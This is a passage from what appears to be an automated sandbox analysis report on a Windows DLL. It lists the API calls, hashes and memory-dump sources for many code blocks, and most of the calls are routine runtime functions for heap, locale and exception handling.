                                                                                                                                                                                                                      • Part of subcall function 6F207AE0: RaiseException.KERNEL32(?,?,00000000,00000000), ref: 6F207AED
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.809848957.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809844997.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809875529.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809886713.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809892708.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Module$ExceptionFileHandleNameRaise
                                                                                                                                                                                                                    • String ID: Module$Module_Raw$REGISTRY
                                                                                                                                                                                                                    • API String ID: 1728487212-549000027
                                                                                                                                                                                                                    • Opcode ID: 68d368bdc4b3cfde7adfc8bdbbacf194cf87c2e9bb0ae6238ffb9ec6577ccaa1
                                                                                                                                                                                                                    • Instruction ID: a4e91f19591544ec9bcff96f3fb1d74e92bb84e997d485970708a8ff878eff9c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 68d368bdc4b3cfde7adfc8bdbbacf194cf87c2e9bb0ae6238ffb9ec6577ccaa1
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D8E193B5A0471D87EF28DB54DC51B9A73F5BF46305F0000A99A0EA7A80EB75EE84CF46
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • IsProcessorFeaturePresent.KERNEL32(0000000C,6F217170,00000000,?,6F217308,00000000), ref: 6F217256
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00000008,00000000,00000000), ref: 6F21727D
                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 6F217284
                                                                                                                                                                                                                    • InitializeSListHead.KERNEL32(00000000), ref: 6F217291
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 6F2172A6
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 6F2172AD
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.809848957.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809844997.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809875529.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809886713.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809892708.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Heap$Process$AllocFeatureFreeHeadInitializeListPresentProcessor
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1475849761-0
                                                                                                                                                                                                                    • Opcode ID: 5c39d03928e971136c121a444831428dbb981b2f5ad5004030c3bc46bf83d4f7
                                                                                                                                                                                                                    • Instruction ID: c314f613ac796fc2177e1c4bd898f5a350eff8575f76772527f7a992bb257078
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5c39d03928e971136c121a444831428dbb981b2f5ad5004030c3bc46bf83d4f7
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DEF0A472644A029BDB209F38C80CB4637FAAF87B22F100029FE81E3644DF709465CF60
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,6F234436,?,00000000), ref: 6F2341A9
                                                                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,6F234436,?,00000000), ref: 6F2341D2
                                                                                                                                                                                                                    • GetACP.KERNEL32(?,?,6F234436,?,00000000), ref: 6F2341E7
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.809848957.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809844997.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809875529.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809886713.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809892708.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: InfoLocale
                                                                                                                                                                                                                    • String ID: ACP$OCP
                                                                                                                                                                                                                    • API String ID: 2299586839-711371036
                                                                                                                                                                                                                    • Opcode ID: 1e388f84bbc0d7cfa82dcfe00d61ee9880b4a351a4ba28152079b9e691a4d9d2
                                                                                                                                                                                                                    • Instruction ID: 1a90f8d76d7d975ba82e50b37baddd06ba51bbd3b5d74abbb248abce9089dbdd
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1e388f84bbc0d7cfa82dcfe00d61ee9880b4a351a4ba28152079b9e691a4d9d2
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6921D3E7E4492EA6D7248B288900AC777B6BF65F65B024594E899CB100E733EE40CF50
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 6F22860C: GetLastError.KERNEL32(00000000,00000000,6F21B6A7,00000000,00000000,?,6F22CF3F,00000000,00000000,?,030B8168,00000000), ref: 6F228610
                                                                                                                                                                                                                      • Part of subcall function 6F22860C: SetLastError.KERNEL32(00000000,00000007,000000FF,?,6F22CF3F,00000000,00000000,?,030B8168,00000000), ref: 6F2286B4
                                                                                                                                                                                                                    • GetACP.KERNEL32(?,?,?,?,?,?,6F229A39,?,?,?,?,?,?,00000004), ref: 6F233A7B
                                                                                                                                                                                                                    • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,6F229A39,?,?,?,?,?,?,00000004), ref: 6F233A8D
                                                                                                                                                                                                                    • _wcschr.LIBVCRUNTIME ref: 6F233B1D
                                                                                                                                                                                                                    • _wcschr.LIBVCRUNTIME ref: 6F233B2B
                                                                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,6F229A39,00000000,6F229B59), ref: 6F233BCE
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.809848957.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809844997.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809875529.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809886713.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809892708.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 4147378913-0
                                                                                                                                                                                                                    • Opcode ID: 513953d7b3f3bc410f77cd834d621ca9897c2a33b7cc60835cfdb4adbf45e5ec
                                                                                                                                                                                                                    • Instruction ID: 61a57e4583a18fc60006c0551704c8a9f1d97640fad21429679b0921d787cafa
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 513953d7b3f3bc410f77cd834d621ca9897c2a33b7cc60835cfdb4adbf45e5ec
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AE71F4F3E0472EAAE7149B34CC42AAA77A8FF05715F10052AE955DB580EB30EE40CF65
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 6F22860C: GetLastError.KERNEL32(00000000,00000000,6F21B6A7,00000000,00000000,?,6F22CF3F,00000000,00000000,?,030B8168,00000000), ref: 6F228610
                                                                                                                                                                                                                      • Part of subcall function 6F22860C: SetLastError.KERNEL32(00000000,00000007,000000FF,?,6F22CF3F,00000000,00000000,?,030B8168,00000000), ref: 6F2286B4
                                                                                                                                                                                                                      • Part of subcall function 6F22860C: _free.LIBCMT ref: 6F228667
                                                                                                                                                                                                                    • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 6F2343F7
                                                                                                                                                                                                                    • IsValidCodePage.KERNEL32(00000000), ref: 6F234452
                                                                                                                                                                                                                    • IsValidLocale.KERNEL32(?,00000001), ref: 6F234461
                                                                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(?,00001001,6F229A32,00000040,?,6F229B52,00000055,00000000,?,?,00000055,00000000), ref: 6F2344A9
                                                                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(?,00001002,6F229AB2,00000040), ref: 6F2344C8
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.809848957.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809844997.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809875529.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809886713.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809892708.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser_free
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1213562535-0
                                                                                                                                                                                                                    • Opcode ID: 59926dd3dd17482fc9d5a7e6b5669cd6ab495db3ac2776e9bdb00177968dea92
                                                                                                                                                                                                                    • Instruction ID: a9b7c04bbe585ad283d0f00d8020b4531ea21e31d4ba13c104ef825fa827bb63
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 59926dd3dd17482fc9d5a7e6b5669cd6ab495db3ac2776e9bdb00177968dea92
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 63517EF3D0062E9BEB10DBA4C844AEEB7B8BF05705F1145A6E910EB190E775AA148F61
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.809848957.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809844997.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809875529.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809886713.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809892708.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: -$#o$-$#o
                                                                                                                                                                                                                    • API String ID: 0-3582302411
                                                                                                                                                                                                                    • Opcode ID: bda20401a7e75538d1b8e0db93edcee4d9660ed28ec4ba96a57bb920da6a2960
                                                                                                                                                                                                                    • Instruction ID: 240c53b33a1c3b6774f64aec3926cdaef573e81ecda7fab0a29b0ef8ffb1b219
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bda20401a7e75538d1b8e0db93edcee4d9660ed28ec4ba96a57bb920da6a2960
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 12022D71E0021D9FDB14CFA9C990A9DB7F5FF48314F15826AD929AB384D731AA41CF90
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 6F214D93
                                                                                                                                                                                                                    • IsDebuggerPresent.KERNEL32 ref: 6F214E5F
                                                                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6F214E7F
                                                                                                                                                                                                                    • UnhandledExceptionFilter.KERNEL32(?), ref: 6F214E89
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.809848957.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809844997.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809875529.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809886713.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809892708.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 254469556-0
                                                                                                                                                                                                                    • Opcode ID: 2ea0549312cf1223af16b94c4b52d6e0507bd1745fca6a55fa0166405974ce47
                                                                                                                                                                                                                    • Instruction ID: 48640da6ce1da597513f481ef9481a58776a7ed5a1496d9af537f24ac1f610d3
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2ea0549312cf1223af16b94c4b52d6e0507bd1745fca6a55fa0166405974ce47
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1731F4B5D0521D9BDB10DFA4C989BCDBBF8BF09304F1041AAE54DAA280EB715A848F45
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,6F21465A,6F2393BC), ref: 6F21453F
                                                                                                                                                                                                                    • UnhandledExceptionFilter.KERNEL32(6F21465A,?,6F21465A,6F2393BC), ref: 6F214548
                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(C0000409,?,6F21465A,6F2393BC), ref: 6F214553
                                                                                                                                                                                                                    • TerminateProcess.KERNEL32(00000000,?,6F21465A,6F2393BC), ref: 6F21455A
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.809848957.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809844997.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809875529.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809886713.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809892708.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3231755760-0
                                                                                                                                                                                                                    • Opcode ID: 91f0d017e2f0b30824869de7e6434bed54eb79948b2344dda9fed4c8560f07f7
                                                                                                                                                                                                                    • Instruction ID: e1eeca1558daa09e7ff21d9d8931c45ebec0da0b47e8c984cef119ce04324149
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 91f0d017e2f0b30824869de7e6434bed54eb79948b2344dda9fed4c8560f07f7
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 34D0CAB3000A08ABDF202BE0D80CA883B2AAB0B232F004000F74A96848CE738470DF65
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.809848957.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809844997.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809875529.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809886713.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809892708.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: \PerfmonBar\config.xml
                                                                                                                                                                                                                    • API String ID: 0-3729978544
                                                                                                                                                                                                                    • Opcode ID: e447191141ac6d62ad897801b7934486e9173bc444533ccf6e88e7879cb8911e
                                                                                                                                                                                                                    • Instruction ID: dfe7aad8c5f8526546400c6bbdddd47b5a3ec662b5179c30269334dc49d085fd
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e447191141ac6d62ad897801b7934486e9173bc444533ccf6e88e7879cb8911e
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C2318BB2D0164C9FDB20DFA4C948B9EBBF4FF09720F00426AE815A7680DB71A905CF90
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 6F22860C: GetLastError.KERNEL32(00000000,00000000,6F21B6A7,00000000,00000000,?,6F22CF3F,00000000,00000000,?,030B8168,00000000), ref: 6F228610
                                                                                                                                                                                                                      • Part of subcall function 6F22860C: SetLastError.KERNEL32(00000000,00000007,000000FF,?,6F22CF3F,00000000,00000000,?,030B8168,00000000), ref: 6F2286B4
                                                                                                                                                                                                                      • Part of subcall function 6F22860C: _free.LIBCMT ref: 6F228667
                                                                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 6F233DEB
                                                                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 6F233E3C
                                                                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 6F233EFC
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.809848957.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809844997.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809875529.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809886713.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809892708.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: InfoLocale$ErrorLast$_free
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1690466582-0
                                                                                                                                                                                                                    • Opcode ID: a8b9fabaa0f3c651015e72725bf5c997490dfe37c186b8d76595d44477a59380
                                                                                                                                                                                                                    • Instruction ID: 12a97e1890326c8c9cd714b6558435a5d390585b066788592d49b6fdf9e9f656
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a8b9fabaa0f3c651015e72725bf5c997490dfe37c186b8d76595d44477a59380
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1061C4F295422B9BEB188E24C983BAA77B8FF04311F10416AE915CA580EB75EE55CF50
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000103), ref: 6F21D40C
                                                                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000103), ref: 6F21D416
                                                                                                                                                                                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000103), ref: 6F21D423
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.809848957.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809844997.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809875529.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809886713.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809892708.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3906539128-0
                                                                                                                                                                                                                    • Opcode ID: aa44936b91edf9dbb4a7a4fd6ae662abf983b36b94d7fedd99ad5dfb8e6044b9
                                                                                                                                                                                                                    • Instruction ID: 4f9c115843a9280467ad7c86e7d31f02055023b4a306a1e3d62ab1a7b34946ee
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: aa44936b91edf9dbb4a7a4fd6ae662abf983b36b94d7fedd99ad5dfb8e6044b9
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2131F37590122D9BCB21DF24D8887CDBBF9BF09310F5041EAE51CA6290EB70AB958F49
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • CreateMenu.USER32(747DF500,770DC720,770DBF08,?,?,6F206417,?,?,6F2078CB,?,6F2067DC,74780DE0), ref: 6F205FE1
                                                                                                                                                                                                                      • Part of subcall function 6F206090: GetMessageTime.USER32 ref: 6F2060CE
                                                                                                                                                                                                                      • Part of subcall function 6F206090: IsSystemResumeAutomatic.KERNEL32 ref: 6F2060D4
                                                                                                                                                                                                                      • Part of subcall function 6F206090: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6F2060F5
                                                                                                                                                                                                                      • Part of subcall function 6F206090: GetDesktopWindow.USER32 ref: 6F206101
                                                                                                                                                                                                                      • Part of subcall function 6F206090: GetSystemDefaultLangID.KERNEL32(747DF500,770DC720,770DBF08,?,?,6F2078CB,?,6F2067DC,74780DE0), ref: 6F20615B
                                                                                                                                                                                                                      • Part of subcall function 6F206090: GetDesktopWindow.USER32 ref: 6F2061B7
                                                                                                                                                                                                                      • Part of subcall function 6F206090: GetUserDefaultUILanguage.KERNEL32(?,?,6F2078CB,?,6F2067DC,74780DE0), ref: 6F206243
                                                                                                                                                                                                                    • GetOpenClipboardWindow.USER32(747DF500,770DC720,770DBF08,?,?,6F206417,?,?,6F2078CB,?,6F2067DC,74780DE0), ref: 6F206017
                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6F206023
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.809848957.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809844997.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809875529.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809886713.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809892708.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Window$DefaultDesktopSystem$AutomaticClipboardCreateCurrentLangLanguageMenuMessageOpenResumeThreadTimeUnothrow_t@std@@@User__ehfuncinfo$??2@
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 453208492-0
                                                                                                                                                                                                                    • Opcode ID: b164e363afbcbe8ca958a5a38a97fd6b2467278d5cde38137402bc410bd6c8e7
                                                                                                                                                                                                                    • Instruction ID: 49961cddd1d834b88cb1eb4a682114b50329d6c1ca1bce6c959524127a58adb5
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b164e363afbcbe8ca958a5a38a97fd6b2467278d5cde38137402bc410bd6c8e7
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BB112773D29B4D45DB02733F8546B54B32B5FAF290B18C723AA81B34A0EF5464E48D50
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.809848957.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809844997.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809875529.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809886713.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809892708.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: .
                                                                                                                                                                                                                    • API String ID: 0-248832578
                                                                                                                                                                                                                    • Opcode ID: 44512ae00ae134d2850074311f602adfc40502570aa9307c47aebc474654733f
                                                                                                                                                                                                                    • Instruction ID: b2c6e3412bcbe40a0346f9de2b58102fe36003a893bb8660ec70ef615de1f454
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 44512ae00ae134d2850074311f602adfc40502570aa9307c47aebc474654733f
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F631F6B190420E6FDB14CE68CC94EFA77FEEF81318F140198E5599B241EA71AE55CF50
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?,00000000,?,6F211FFA,?,?,00000000,?,?,C000008C), ref: 6F2173B0
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?,6F211FFA,?,?,00000000,?,?,C000008C), ref: 6F2173B7
                                                                                                                                                                                                                      • Part of subcall function 6F217224: GetProcessHeap.KERNEL32(00000000,?,?,6F21738A,00000000,00000000,?,6F211FFA,?,?,00000000,?,?,C000008C), ref: 6F21723C
                                                                                                                                                                                                                      • Part of subcall function 6F217224: HeapFree.KERNEL32(00000000,?,6F21738A,00000000,00000000,?,6F211FFA,?,?,00000000,?,?,C000008C), ref: 6F217243
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.809848957.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809844997.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809875529.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809886713.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809892708.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Heap$FreeProcess
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3859560861-0
                                                                                                                                                                                                                    • Opcode ID: d3aeb5be67940eacc547932cd3b7a053385267d1d246cdbdb9d1db1b99c52a7c
                                                                                                                                                                                                                    • Instruction ID: 3af5f552612236849e105c839a82027e39ddc278c7ddce6e0c0e2c518580fa0f
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d3aeb5be67940eacc547932cd3b7a053385267d1d246cdbdb9d1db1b99c52a7c
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 06F02E32009B0DDBCB309A54D80CFD73BD5DFC2B22F00002AFA55929408F7594A0CE54
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 6F214BBC
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.809848957.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809844997.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809875529.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809886713.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809892708.000000006F24E000.00000002.00020000.sdmp Download File
